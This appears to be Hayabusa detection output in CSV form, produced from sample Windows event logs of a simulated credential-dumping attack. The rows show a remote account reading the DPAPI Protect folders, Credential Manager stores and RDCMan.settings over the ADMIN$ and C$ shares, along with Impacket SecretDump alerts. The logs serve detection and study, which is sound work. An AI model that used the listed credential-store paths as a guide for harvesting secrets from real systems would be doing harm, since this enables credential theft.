2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
